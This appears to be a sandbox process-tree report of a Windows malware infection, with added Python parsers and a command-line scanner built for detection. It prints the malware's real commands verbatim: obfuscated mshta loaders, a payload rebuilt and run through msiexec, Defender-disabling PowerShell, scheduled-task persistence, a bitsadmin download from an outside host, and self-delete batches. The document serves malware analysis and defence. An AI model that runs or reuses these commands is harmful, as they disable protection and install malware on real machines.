C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\_0aRxV7zFs9aNhsV38TcVZ3L.exe"C:\Users\Admin\Pictures\Adobe Films\_0aRxV7zFs9aNhsV38TcVZ3L.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 6567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 6687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 7047⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 7047⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 11247⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\XcYMp2GmVj2G6dzAdKSZf0P2.exe"C:\Users\Admin\Pictures\Adobe Films\XcYMp2GmVj2G6dzAdKSZf0P2.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\B8YkkT0rY7k3CXY_wSzatFSY.exe"C:\Users\Admin\Pictures\Adobe Films\B8YkkT0rY7k3CXY_wSzatFSY.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\B8YkkT0rY7k3CXY_wSzatFSY.exe"C:\Users\Admin\Pictures\Adobe Films\B8YkkT0rY7k3CXY_wSzatFSY.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe"C:\Users\Admin\Pictures\Adobe Films\ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\zcwm5iBuVOBi3eEoRbXV0gY2.exe"C:\Users\Admin\Pictures\Adobe Films\zcwm5iBuVOBi3eEoRbXV0gY2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\zcwm5iBuVOBi3eEoRbXV0gY2.exe"C:\Users\Admin\Pictures\Adobe Films\zcwm5iBuVOBi3eEoRbXV0gY2.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14febbc433.exeSat14febbc433.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 6602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 6722⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 6762⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 8122⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 9082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 8882⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 11122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\462d008ebddd44b5806d5883507d44b0 /t 2852 /p 28481⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\F30D.exeC:\Users\Admin\AppData\Local\Temp\F30D.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\F30D.exeC:\Users\Admin\AppData\Local\Temp\F30D.exe2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\D8BA.exeC:\Users\Admin\AppData\Local\Temp\D8BA.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D8BA.exeC:\Users\Admin\AppData\Local\Temp\D8BA.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\366B.exeC:\Users\Admin\AppData\Local\Temp\366B.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\70E5.exeC:\Users\Admin\AppData\Local\Temp\70E5.exe2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\10DF.exeC:\Users\Admin\AppData\Local\Temp\10DF.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 10DF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10DF.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 10DF.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\3F14.exeC:\Users\Admin\AppData\Local\Temp\3F14.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\NIKE.exe"C:\Users\Admin\AppData\Local\Temp\NIKE.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\136.exe"C:\Users\Admin\AppData\Local\Temp\136.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\A2E0.exeC:\Users\Admin\AppData\Local\Temp\A2E0.exe2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"3⤵
- Suspicious behavior: AddClipboardFormatListener
-
C:\Users\Admin\AppData\Local\Temp\E757.exeC:\Users\Admin\AppData\Local\Temp\E757.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E757.exeC:\Users\Admin\AppData\Local\Temp\E757.exe3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\E757.exe"C:\Users\Admin\AppData\Local\Temp\E757.exe" --Admin IsNotAutoStart IsNotTask4⤵
-
C:\Users\Admin\AppData\Local\Temp\E757.exe"C:\Users\Admin\AppData\Local\Temp\E757.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe"C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe"C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe"7⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build3.exe"C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build3.exe"C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build3.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\F468.exeC:\Users\Admin\AppData\Local\Temp\F468.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\FB7E.exeC:\Users\Admin\AppData\Local\Temp\FB7E.exe2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipT: CLOSe ( CReATeobjeCT ("wsCriPt.shELL" ). rUN ( "CmD.Exe /q /c TYpe ""C:\Users\Admin\AppData\Local\Temp\FB7E.exe"" >..\EQPEwF~GHJ5D.eXE && sTArT ..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq &If """" =="""" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\FB7E.exe"" ) do taskkill /f -IM ""%~nXK"" " , 0 , TRue ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\Admin\AppData\Local\Temp\FB7E.exe" >..\EQPEwF~GHJ5D.eXE && sTArT ..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq &If "" =="" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\FB7E.exe" ) do taskkill /f -IM "%~nXK"4⤵
-
C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipT: CLOSe ( CReATeobjeCT ("wsCriPt.shELL" ). rUN ( "CmD.Exe /q /c TYpe ""C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE"" >..\EQPEwF~GHJ5D.eXE && sTArT ..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq &If ""/pZ5QGjTyt68Asb0yBdT2u86meJWIOq "" =="""" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE"" ) do taskkill /f -IM ""%~nXK"" " , 0 , TRue ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE" >..\EQPEwF~GHJ5D.eXE && sTArT ..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq &If "/pZ5QGjTyt68Asb0yBdT2u86meJWIOq " =="" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE" ) do taskkill /f -IM "%~nXK"7⤵
- Blocklisted process makes network request
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT:CloSE ( CrEAtEObjEcT ("WScrIpt.SheLL" ). RUn ( "cmd /Q /C ecHO | sET /p = ""MZ"" > uYWtD.N & COpy /B /Y uYwTd.N+ WTWIUAL0.Kci + KNhwd.RL +ZYKB.3YA +QIKkd6u.7NY + T5IJ2.6Z + L8YYF.2W ..\x3l5OyC.C& Del /q *& sTArt msiexec.exe /Y ..\x3L5OyC.C " , 0 , TRUe ) )6⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C ecHO | sET /p = "MZ" > uYWtD.N & COpy /B /Y uYwTd.N+ WTWIUAL0.Kci + KNhwd.RL +ZYKB.3YA +QIKkd6u.7NY + T5IJ2.6Z + L8YYF.2W ..\x3l5OyC.C& Del /q *& sTArt msiexec.exe /Y ..\x3L5OyC.C7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>uYWtD.N"8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\x3L5OyC.C8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -IM "FB7E.exe"5⤵
- Kills process with taskkill
-
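The two cmd.exe command lines that mshta.exe launches in this tree (under kPBhgOaGQk.exe earlier and under EQPEwF~GHJ5D.eXE just above) rebuild a PE on disk instead of downloading one: `echo | set /p = "MZ" > file` writes the two header bytes with no trailing newline, `copy /b` concatenates that header with fragments the loader dropped next to it, `del /q *` removes the pieces, and `msiexec /y` (or `-y`) calls DllRegisterServer in the result, so the payload runs inside msiexec.exe rather than as a new image. In the first chain one fragment is itself produced by an `echo ... > TRMBiI66.CU` redirect that embeds the local temp path, so the assembled file's hash is not stable across hosts. The parser below is an added example, not part of the sandbox report: it takes the two observed command lines verbatim as constructed input, tolerates the randomised letter case, and checks that the header file, the `copy /b` destination and the `msiexec` argument refer to the same files (compared case-insensitively, as NTFS does). Nothing in it is the loader's own code.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the two cmd.exe command lines spawned by mshta.exe in
# the process tree above, copied verbatim (the mixed case is the loader's own).
SAMPLES = [
    r'"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC',
    r'"C:\Windows\System32\cmd.exe" /Q /C ecHO | sET /p = "MZ" > uYWtD.N & COpy /B /Y uYwTd.N+ WTWIUAL0.Kci + KNhwd.RL +ZYKB.3YA +QIKkd6u.7NY + T5IJ2.6Z + L8YYF.2W ..\x3l5OyC.C& Del /q *& sTArt msiexec.exe /Y ..\x3L5OyC.C',
]

# cmd.exe [/switch ...] /C|/R <body>   -> capture <body>
_CMD_BODY = re.compile(r'^\s*"?[^"]*?cmd(?:\.exe)?"?\s+(?:/[a-z]\s+)*?/[cr]\s+(.*)$', re.I | re.S)
# echo | set /p = "MZ" > file          (set /p writes its prompt text without a newline)
_HEADER = re.compile(r'^echo\s*\|\s*set\s*/p\s*=\s*"([^"]*)"\s*>\s*(\S+)\s*$', re.I)
# echo <text> > file                   (a fragment generated at run time)
_ECHO_REDIR = re.compile(r'^echo\b[^>]*>\s*(\S+)\s*$', re.I)
# copy [/b] [/y] src1 + src2 + ... dest
_COPY = re.compile(r'^copy\s+((?:/\w\s+)*)(.+?)\s+(\S+)\s*$', re.I)
_DEL = re.compile(r'^del\b', re.I)
_START = re.compile(r'^start\s+(.*)$', re.I)
# msiexec /y <file> | msiexec -y <file>: loads <file> and calls its DllRegisterServer
_MSIEXEC = re.compile(r'^msiexec(?:\.exe)?\s+[-/]y\s+(\S+)', re.I)


@dataclass
class Reassembly:
    header_bytes: str = ""                    # text written by 'set /p' (expect "MZ")
    header_file: str = ""                     # file that receives those bytes
    fragments: List[str] = field(default_factory=list)  # copy /b sources, in order
    binary_copy: bool = False                 # /b present: byte-exact concatenation
    output: str = ""                          # copy /b destination
    launch_target: str = ""                   # file handed to msiexec /y
    echo_generated: List[str] = field(default_factory=list)  # fragments created by echo at run time
    cleanup: bool = False                     # 'del /q *' seen

    @property
    def consistent(self) -> bool:
        """Header, concatenation and launch all refer to the same files (NTFS is case-insensitive)."""
        return (self.header_bytes.upper() == "MZ" and self.binary_copy and bool(self.fragments)
                and self.fragments[0].lower() == self.header_file.lower()
                and self.output.lower() == self.launch_target.lower())


def split_commands(body: str) -> List[str]:
    """Split a cmd.exe body on & / && (the observed lines never quote an ampersand)."""
    return [s.strip() for s in re.split(r'\s*&&?\s*', body) if s.strip()]


def parse_reassembly(cmdline: str) -> Optional[Reassembly]:
    """Return the reassembly steps found in a cmd.exe command line, or None if there is no copy /b."""
    m = _CMD_BODY.match(cmdline)
    if not m:
        return None
    r = Reassembly()
    generated = set()
    for seg in split_commands(m.group(1)):
        h = _HEADER.match(seg)
        if h:
            r.header_bytes, r.header_file = h.group(1), h.group(2)
            continue
        e = _ECHO_REDIR.match(seg)
        if e:
            generated.add(e.group(1).lower())
            continue
        c = _COPY.match(seg)
        if c:
            r.binary_copy = "/b" in c.group(1).lower().split()
            r.fragments = [p.strip() for p in c.group(2).split("+") if p.strip()]
            r.output = c.group(3)
            continue
        if _DEL.match(seg):
            r.cleanup = True
            continue
        s = _START.match(seg)
        if s:
            x = _MSIEXEC.match(s.group(1))
            if x:
                r.launch_target = x.group(1)
    if not r.fragments:
        return None  # some other cmd.exe invocation, not a copy /b reassembly
    r.echo_generated = [f for f in r.fragments if f.lower() in generated]
    return r


if __name__ == "__main__":
    for line in SAMPLES:
        r = parse_reassembly(line)
        print(f"{r.output}: {len(r.fragments)} fragments, header {r.header_bytes!r} in {r.header_file}, "
              f"run via msiexec /y {r.launch_target}, run-time fragments {r.echo_generated}, consistent={r.consistent}")
```

Feeding the parser a process-creation log rather than the two embedded lines gives a compact description of what each such chain assembled and where it was launched from, which is more useful for triage than the raw command line; the `consistent` check also separates a real reassembly from a cmd.exe line that merely happens to contain `copy /b`.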
C:\Users\Admin\AppData\Local\Temp\552.exeC:\Users\Admin\AppData\Local\Temp\552.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\CD5.exeC:\Users\Admin\AppData\Local\Temp\CD5.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im CD5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CD5.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im CD5.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4185F825\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4185F825\setup_install.exe"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
-
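Most stages in this tree give themselves away through LOLBin command lines rather than through the dropped executables: the Defender exclusion and real-time protection changes via Add-MpPreference and Set-MpPreference just above, the mshta.exe `vbscript:` one-liners, schtasks persistence with `/rl HIGHEST` or a one-minute `/sc minute /mo 1` trigger, the `icacls /deny *S-1-1-0` (Everyone) entry the Djvu stage places on its own working folder, the `bitsadmin /Transfer` download, `msiexec /y` registering a file that is not an MSI, browser kills ahead of credential theft, and the `taskkill ... & timeout ... & del` self-delete batch. The scanner below is an added example, not the sandbox's detection logic. Its input is a constructed list of (parent image, child image, command line) records copied from this tree, plus a few benign records built for contrast; the field layout is assumed to match a process-creation event such as Sysmon event 1, and each rule is keyed to the child image name so a pattern is never tested against an unrelated command line.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    image: str                           # child image file name this rule applies to (lower-case)
    pattern: re.Pattern                  # must match the command line
    detail: Optional[re.Pattern] = None  # optional: pulls out the argument worth reporting


def _rx(p: str) -> re.Pattern:
    return re.compile(p, re.I | re.S)


RULES = [
    # mshta.exe running an inline vbscript:/javascript: URL instead of an .hta file
    Rule("mshta_inline_script", "mshta.exe", _rx(r'\b(?:vbscript|javascript):')),
    # Defender tampering as seen in the setup_install.exe stage above
    Rule("defender_exclusion_added", "powershell.exe", _rx(r'add-mppreference\s+-exclusion\w*\s+"?([^"\s]+)')),
    Rule("defender_realtime_disabled", "powershell.exe", _rx(r'set-mppreference\b.*?-disablerealtimemonitoring\s+\$?true')),
    # persistence with an elevated run level or a one-minute trigger; detail = task name
    Rule("scheduled_task_persistence", "schtasks.exe",
         _rx(r'/create\b.*?(?:/rl\s+highest|/sc\s+minute\s+/mo\s+1\b)'), _rx(r'/tn\s+"([^"]+)"')),
    # Djvu denies Everyone (S-1-1-0) delete rights on its own folder; detail = folder
    Rule("icacls_deny_everyone", "icacls.exe", _rx(r'icacls\s+"?([^"]+?)"?\s+/deny\s+\*?S-1-1-0:')),
    Rule("bitsadmin_download", "bitsadmin.exe", _rx(r'/transfer\b.*?\b(https?://\S+)')),
    # msiexec /y <file> calls DllRegisterServer in an arbitrary file, no .msi involved
    Rule("msiexec_registers_dll", "msiexec.exe", _rx(r'msiexec(?:\.exe)?"?\s+[-/]y\s+(\S+)')),
    # stealers kill browsers so their credential databases are no longer locked
    Rule("browser_process_kill", "taskkill.exe", _rx(r'/im\s+((?:chrome|firefox|msedge|iexplore|opera|brave)\.exe)')),
    # kill self, wait, delete own image: the stealer clean-up batch (\1 ties del to the killed name)
    Rule("self_delete_batch", "cmd.exe",
         _rx(r'taskkill\s+/im\s+(\S+)\s+/f\b.*?\btimeout\s+/t\s+\d+.*?\bdel\s+/f\s+/q\s+"?[^"&]*\1')),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    image: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan(events: Iterable[Tuple[str, str, str]]) -> List[Finding]:
    """events: (parent image, child image, child command line). Returns one Finding per rule hit."""
    findings: List[Finding] = []
    for parent, image, cmdline in events:
        base = _basename(image)
        for rule in RULES:
            if base != rule.image:
                continue
            m = rule.pattern.search(cmdline)
            if not m:
                continue
            d = rule.detail.search(cmdline) if rule.detail else m
            detail = next((g for g in (d.groups() if d else ()) if g), "")
            findings.append(Finding(rule.name, _basename(parent), base, detail))
    return findings


def summarize(findings: Iterable[Finding]) -> Dict[str, int]:
    return dict(Counter(f.rule for f in findings))


# Constructed input: records copied from the process tree above (mshta inner command abridged).
SAMPLE_EVENTS = [
    ("cmd.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    ("cmd.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r'powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable'),
    ("XgylPHsAOW5QAFuZHh9yeO4V.exe", r"C:\Windows\SysWOW64\mshta.exe", r'"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y", 0 , truE) )'),
    ("build3.exe", r"C:\Windows\SysWOW64\schtasks.exe", r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"'),
    ("HQ55SfKidXoRs_jbeqXyDCZL.exe", r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST'),
    ("E757.exe", r"C:\Windows\SysWOW64\icacls.exe", r'icacls "C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a" /deny *S-1-1-0:(OI)(CI)(DE,DC)'),
    ("autosubplayer.exe", r"C:\Windows\SysWOW64\bitsadmin.exe", r'"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z'),
    ("cmd.exe", r"C:\Windows\SysWOW64\msiexec.exe", r'msiexec -Y ..\lXQ2g.WC'),
    ("cmd.exe", r"C:\Windows\SysWOW64\taskkill.exe", r'taskkill /f /im chrome.exe'),
    ("10DF.exe", r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c taskkill /im 10DF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10DF.exe" & del C:\ProgramData\*.dll & exit'),
]

# Constructed benign records: same images with ordinary arguments; must yield no findings.
BENIGN_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r'powershell -NoProfile -Command Get-MpPreference'),
    ("services.exe", r"C:\Windows\system32\msiexec.exe", r'C:\Windows\system32\msiexec.exe /V'),
    ("explorer.exe", r"C:\Windows\System32\schtasks.exe", r'schtasks /query /fo LIST'),
    ("cmd.exe", r"C:\Windows\System32\taskkill.exe", r'taskkill /f /im notepad.exe'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:28} {f.parent} -> {f.image}  {f.detail}")
    print(summarize(scan(SAMPLE_EVENTS)), "benign hits:", len(scan(BENIGN_EVENTS)))
```

Keying each rule to the child image is what keeps the benign records quiet: `msiexec.exe /V` (the installer service) and a `taskkill` of notepad.exe share images with two of the hits but not arguments, and the mshta command line, which also contains `taskkill` and `copy`, is only ever tested by the mshta rule. The backreference in `self_delete_batch` ties the deleted path to the process name that was just killed, so an ordinary cleanup batch that kills one thing and deletes another does not fire.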
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14514904a4b.exe5⤵
-
